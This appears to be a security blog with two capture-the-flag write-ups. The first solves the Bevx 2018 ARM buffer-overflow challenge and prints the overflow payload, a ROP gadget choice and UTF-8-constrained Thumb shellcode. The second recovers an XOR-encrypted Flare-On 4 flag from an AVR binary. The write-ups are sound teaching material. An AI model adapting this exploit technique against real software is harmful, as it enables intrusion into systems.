Solving Second Bevx Challenge 2018

The Bevx challenge is a security challenge from Beyond Security for their Bevx conference. I didn’t know about the first challenge, and since I don’t use Twitter every day, I almost missed this second challenge. I only found out about this since my friend shared the Twitter link. It seems that the tweet causes a bit of confusion because several people asked me: where is the challenge link?

The challenge link is in the picture:

Here it is zoomed in

And this is the link, so you don’t have to retype that:

It also contains a hint: the red text says “ARM buffer overflow”.

The Challenge

Here is the challenge text:

The binary is a ‘server’ which expects incoming connections to it when an incoming connection occurs and a certain ‘protocol’ is implemented it will print out ‘All your base’ and exit. Your challenge is to write an exploit that will cause the program to print out ‘Belong to us!’.

We are given an ARM binary, which we can be checked using file :

$ file main
main: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=da5353188930ee93a16329bee21858fde73a11d2, stripped

Trying to run this in Raspberry Pi doesn’t work (presumably because of the memory addresses that they chose for the binary, which has something to do with the main challenge part). Fortunately, I have a Pine64 and it works there. I also tried using qemu-arm-static, and it also works fine:

 qemu-arm-static ./main

We can even trace the execution:

qemu-arm-static  -strace -d in_asm,cpu  ./main 2> log.txt

The binary is statically linked and stripped. It means that you will not be able to find the function names in the ELF file. The Qemu output helps me to quickly identify some syscalls.

To get the complete list of syscall, we can look at Linux kernel source file arch/arm/include/asm/unistd.h.

Basically, the server will create a listening socket, accept a connection, allocate memory using mmap at a fixed address (0xdada0000), receive some data to 0xdada0000 (maximum 256 bytes), checks if it satisfies certain requirements, then copies the message to 128 bytes stack, then prints the string “All your base”.

The Protocol and Filter

The first check that we need to get through is the headers: there are 8 bytes that we need to use to get through the first check. This is quite easy, it just compares the first 4 bytes with the result of a function call, and the next 4 bytes from another function call. Without understanding the function we can find these values easily using Qemu.

First we just send some string “AAAAAAAAAAAA”, the program will just exit. We can check the value when the comparison was made.

Now sending: “;*k%:ZnAAAA” (3b2a6b25 3a5a6e 41414141) to the server will make the server print “All Your Base” and then exit.

The next check is a bit more complicated, but the constants in the listing (0xF0C0C0 0xE08080 ) helps a lot in finding the algorithm. I admit that I was lucky to have worked with UTF-8 related stuff and Unicode in general so that looking at the constant already gives me a vague idea that it might use UTF-8. And Google is always available to confirm this.

Google search shows that it is used in UTF-8 validity checking. If the received characters are a valid UTF-8 string then it will print “All Your Base” and then exit (the string AAAA happens to be a valid UTF-8 string). Sending a string that is not a valid UTF-8 sequence will cause the program to exit without print “All your base”.

Looking at the first C code in the search result shows that the code is very similar to the one in the disassembly. I didn’t check the detail of the validation code if it is exactly the same, but it reminds me of an article in Phrack Magazine: UTF-8 Shellcode (for Intel x86 Architecture) (please read this to understand about valid UTF-8 byte sequence). Here is an excerpt from the article about valid sequences:

At this point, I did some testing to send valid and invalid UTF-8 sequences, and it seems to work as expected: byte sequences that are not a valid UTF-8 code are rejected, the server will just exit without printing “All Your Base”.

Jump to where?

So I moved to the next step: the buffer overflow part. Sending long strings of “HEADER” + “AAAAAA…” will make it crash and the PC is at 0x41414141. So the minimum payload that I need to send to make it crash is:

ch1 = "3b2a6b25".decode("hex")
ch2 = "3a5a6e01".decode("hex")
r2 = "XXXX"
r3 = "YYYY"
ip = "AAAA"

payload = ch1 + ch2 + "A"* 128 + r2 + r3 + ip

It means that I can change the register r2, r3 and ip. At this point, I thought: well, this should easy. But it turns out that the addresses chosen by the programmer are devious. Here is the content of the /proc/maps when the program is running:

00008000-00009000 r-xp 00000000 b3:01 125513             /home/yohanes/main
00d80000-00dfa000 r-xp 00008000 b3:01 125513             /home/yohanes/main
00e01000-00e03000 rwxp 00081000 b3:01 125513             /home/yohanes/main
da000000-da001000 rwxp 00088000 b3:01 125513             /home/yohanes/main
da001000-da024000 rwxp 00000000 00:00 0                  [heap]
dada0000-dada1000 rwxp 00000000 00:00 0
fffcf000-ffff0000 rwxp 00000000 00:00 0                  [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0                  [vectors]

Note that we are sending bytes in little endian, so sending 0x12 0x34 0x56 0x78 will make us jump to 0x78563412. If we overwrite 4 bytes of the PC, then we can’t go to address: 0xdada0000 (where our buffer is), since 0xda 0xda can never be a part of a valid UTF-8 sequence. We can’t jump directly to our code segment at 0x00d8XXYY - 0x00dfXXYY, because YY XX 0xd8 0x00 - YY XX 0xdf 0x00 also cannot form a valid UTF-8 sequence.

For the same reasoning, we also can’t go to 0x00e0XXYY or to the stack (0xff is not valid anywhere in UTF-8 sequence). We can only go to the heap, but I was not able to find anything there. I also thought that maybe the count of the received bytes can be made into an instruction that could help us jump to our buffer, but since we are limited to only receiving 256 bytes (so the count is maximum 0x0100), I couldn’t find any instruction that can work.

If we overwrite only 2 bytes of the instruction pointer (2 bytes of LSB), then we can go to 00 D8 XX YY (only addresses with 0xd8 prefix, not 0xd9-0xdf), but since we only overwrite 2 bytes of the return address, we can not control the rest of the stack, so we can’t do a deep ROP sequence. I used xrop to find possible sequences that I can use. This took me a while because somehow I missed the eor/blx gadget. This gadget is at 0xd87480. It is perfect I can control R2 and R3, and both of them can be XOR-ed together to create value 0xdada00xx

So I chose these numbers

r2 = "\xc6\x80\x5a\x17"
r3 = "\xe1\x80\x80\xcd"
ip = "\x80\x74" #Jump To d87480

# r2 ^ r3 will result in address 0xdada0027

I chose an odd address (LSB bit is 1) because I want to continue in THUMB mode, and I will also need the string “Belong to us!\x00” as part of the header, so at least I will need to start at address 0x17, but I thought: why not give an extra space in case I need it for storing something, since at this point I haven’t constructed the shellcode yet.

As a side note: here I realized that the UTF-8 filtering is not exactly the same as I expected, a sequence of “0xE1 0x80 0x80 0x74” should be acceptable, but somehow it was not acceptable at the end of the string. I didn’t check why since I can use the sequence at other parts of the string and I already got the constant that I am looking for.

The Shellcode

So now we need to write the shellcode. Having a debugger helps me a lot. Unfortunately, the gdb in my pine64 doesn’t support hardware breakpoint. So I made a minimal shellcode: ldr r0, [r0] since I know that at 0x0d812a0 r0 is set to 0, this will cause the program to crash because it referenced the address 0x0. When it crashes I can check the register values.

We can use R9, R10, or LR to reference something in the data section (by adding/subtracting value from that register). We can reference something in our buffer using R3. At this point, I have two options: reading the ARM Thumb instruction set reference to check the encoding of every instruction, or just try out my luck if the instruction will work. I did kind of both.

There are several options that I can do here to print: “Belong to us!”. I can directly call something in the code that uses “write” syscall or I can just change the existing “All your base” string in memory and resume execution to have the desired effect (the length of these two strings are the same). I think that the second method is “cleaner” since the application will exit cleanly.

Some of the first instruction that I checked was LDR Rx, [Rx] and STR Rx, [Rx]. And it turns out both will generate a valid UTF-8 sequence. SoI start by setting our register to the address of “Belong to us!”. This was the solution that I sent

movs r0, r0 
movs r0, r0
str r3, [r3]
movs r2, #8
strb r2, [r3]
ldr r3, [r3]

The first two instructions are just NOPs. I want to change the value 0xdada00xx (R3 value) to 0xdada0008 (the start of the string “Belong to us!”. I did this by: storing r3 to [r3] (which contains two NOPS (movs r0, r0), set r2 to #8, then store 1 byte to the [r3], this will overwrite the 0xdada00xx to 0xdada0008.

Just because I concentrated too much on LDR/STR. I made it too complicated since this much simpler code will also work and is a valid UTF-8 sequence.

subs r3, r3, #19

Next is to find the address of the allocated “All your base” string. This is referenced in: 0xd810e8 and the difference with 0xd81e34 (value of r9) is 0xd4c. This is the sequence that I found to subtract 0xd4c from r9. First I fill in 0xd, shift left by 4

movs r2, #0xd
lsls r2, r2, #8
adds r2, #0x4c
negs r2, r2
add r2, r2, r9
ldr r2, [r2] ; r2 now points to variable in heap
ldr r2, [r2] ; r2 now points to the allocated memory

Note: in my original submission I used two 4 bits left shifts for lsls to shift 8 bits because somehow I misread the documentation, I thought the shift immediate value was limited to 3 bits (0-7) when in fact it is 5 bits (0-31).

lsls r2, r2, #4
lsls r2, r2, #4

Now the rest is just to copy/overwrite the original string, the length of the string with NUL is 14 bytes, but we can copy 16 bytes easily without loop (only 4 loads + 4 stores).

ldr r4, [r3]
str r4, [r2]
ldr r4, [r3, 4]
str r4, [r2, 4]
adds r3, r3, #8
adds r2, r2, #8
ldr r4, [r3]
str r4, [r2]
ldr r4, [r3, 4]
str r4, [r2, 4]

I tried to use ldr r4, [r3, 8], but the generated code is not a valid UTF-8 sequence, so I just add 8 to r3 and r2.

And now the last part is to return to 0xd80fff, this is 0xe35 bytes from r9:

movs r2, #0xe
lsls r2, r2, #8
adds r2, #0x35
negs r2, r2
add r2, r2, r9
bx r2

So that’s it, the code will resume as if nothing happens, but now the string has been changed, and then it will close the socket cleanly.

This challenge was quite fun, it looks very simple at first, but is quite challenging. The code that I submitted works well but was not very optimized.

When the challenge was posted it was a Songkran Holiday in Thailand. I started working on this challenge more than 24 hours since it was posted so I was in hurry to send it quickly hoping that I might get the second or third prize. I was happily surprised when I found out that I was the first to send the correct solution.

Flare-On 4: Challenge 9 Quick Solution

This is an Arduino (AVR) challenge. You can read the full official solution from FireEye, here I just want to show how we can just find use “grep” to quickly find the decryption function to get the flag.

At first, I was going to try to understand what this binary does, but before going too deep, I had an idea: this binary is so small, what if I can just find the flag string without looking at the program’s logic. Looking at the strings present in the binary, it is obvious The flag is not in cleartext, so it must be encrypted somehow.

Most encryption algorithm will involve the use of XOR (eor in AVR). Looking at the disassembly, all EORs are just to clear a register (e.g: eor r1, r1). There is only one eor in 0xaee that is not clearing a register (eor r25, r24), which is the last one in this grep output.

$ avr-objdump -m avr -D remorse.ino.hex |grep eor
      c4:	11 24       	eor	r1, r1
     1ec:	99 27       	eor	r25, r25
     2e6:	99 27       	eor	r25, r25
     340:	11 27       	eor	r17, r17
     59e:	88 27       	eor	r24, r24
     742:	11 24       	eor	r1, r1
     78e:	11 24       	eor	r1, r1
     7f2:	11 24       	eor	r1, r1
     904:	11 24       	eor	r1, r1
     a16:	11 24       	eor	r1, r1
     aee:	98 27       	eor	r25, r24

Looking at the code around it: it is a single loop, with eor and subi. This must be the decrypt loop.

  ae6:       ldi     r26, 0x6C       ; 108
  ae8:       ldi     r27, 0x05       ; 5
  aea:       ldi     r18, 0x00       ; 0

  aec:       ld      r25, Z+
  aee:       eor     r25, r24
  af0:       add     r25, r18
  af2:       st      X+, r25
  af4:       subi    r18, 0xFF       ; 255
  af6:       cpi     r18, 0x17       ; 23
  af8:       brne    .-14            ; 0xaec 

We just need to find the encrypted data pointed by Z (which is a pair of R31:R30), and r24 (the xor key). Looking a bit up, we found the code that fills in the encrypted data. It sets Z with the value of Y (pair of R29:R28), clears the memory, and fill it with some bytes.

  a80:   movw    r30, r28        ; Z = Y
  a82:   adiw    r30, 0x01       ; Z++
  a84:   movw    r26, r30        ; X = Z
  a86:   ldi     r25, 0xFF       ; 
  a88:   add     r25, r30        ; 

  a8a:   st      X+, r1
  a8c:   cpse    r25, r26
  a8e:   rjmp    .-6             ; 0xa8a 

  a90:   ldi     r25, 0xB5 
  a92:   std     Y+1, r25  
  a94:   std     Y+2, r25  
  a96:   ldi     r25, 0x86 
  a98:   std     Y+3, r25  
  a9a:   ldi     r25, 0xB4 
  a9c:   std     Y+4, r25  
  a9e:   ldi     r25, 0xF4 
  aa0:   std     Y+5, r25  
  aa2:   ldi     r25, 0xB3 
  aa4:   std     Y+6, r25  
  aa6:   ldi     r25, 0xF1 
  aa8:   std     Y+7, r25  
  aaa:   ldi     r18, 0xB0 
  aac:   std     Y+8, r18  
  aae:   std     Y+9, r18  
  ab0:   std     Y+10, r25 
  ab2:   ldi     r25, 0xED 
  ab4:   std     Y+11, r25 
  ab6:   ldi     r25, 0x80 
  ab8:   std     Y+12, r25 
  aba:   ldi     r25, 0xBB 
  abc:   std     Y+13, r25 
  abe:   ldi     r25, 0x8F 
  ac0:   std     Y+14, r25 
  ac2:   ldi     r25, 0xBF 
  ac4:   std     Y+15, r25 
  ac6:   ldi     r25, 0x8D 
  ac8:   std     Y+16, r25 
  aca:   ldi     r25, 0xC6 
  acc:   std     Y+17, r25 
  ace:   ldi     r25, 0x85 
  ad0:   std     Y+18, r25 
  ad2:   ldi     r25, 0x87 
  ad4:   std     Y+19, r25 
  ad6:   ldi     r25, 0xC0 
  ad8:   std     Y+20, r25 
  ada:   ldi     r25, 0x94 
  adc:   std     Y+21, r25 
  ade:   ldi     r25, 0x81 
  ae0:   std     Y+22, r25 
  ae2:   ldi     r25, 0x8C 
  ae4:   std     Y+23, r25 

Going a bit up again, we found a ret (return), which means its the end of another function/subroutine. It seems that r24 is filled somewhere else by the caller of this decrypt function.

It doesn’t matter, r24 is just an 8 bit register (256 possible values). Translating this to python, with a brute force loop:

a = "b5b586b4f4b3f1b0b0f1ed80bb8fbf8dc68587c094818c".decode("hex")

for key in range(0, 256):
        s = ''
        for i,c in enumerate(a):
                m = ((ord(c)^key) + i)&0xff
                s = s + chr(m)
        print key, hex(key), s

And since all flags always have a suffix, we can just add a grep:

$ python|strings|grep flare
219 0xdb [email protected]

So the flag is [email protected] and the key is 219 decimal (0xdb).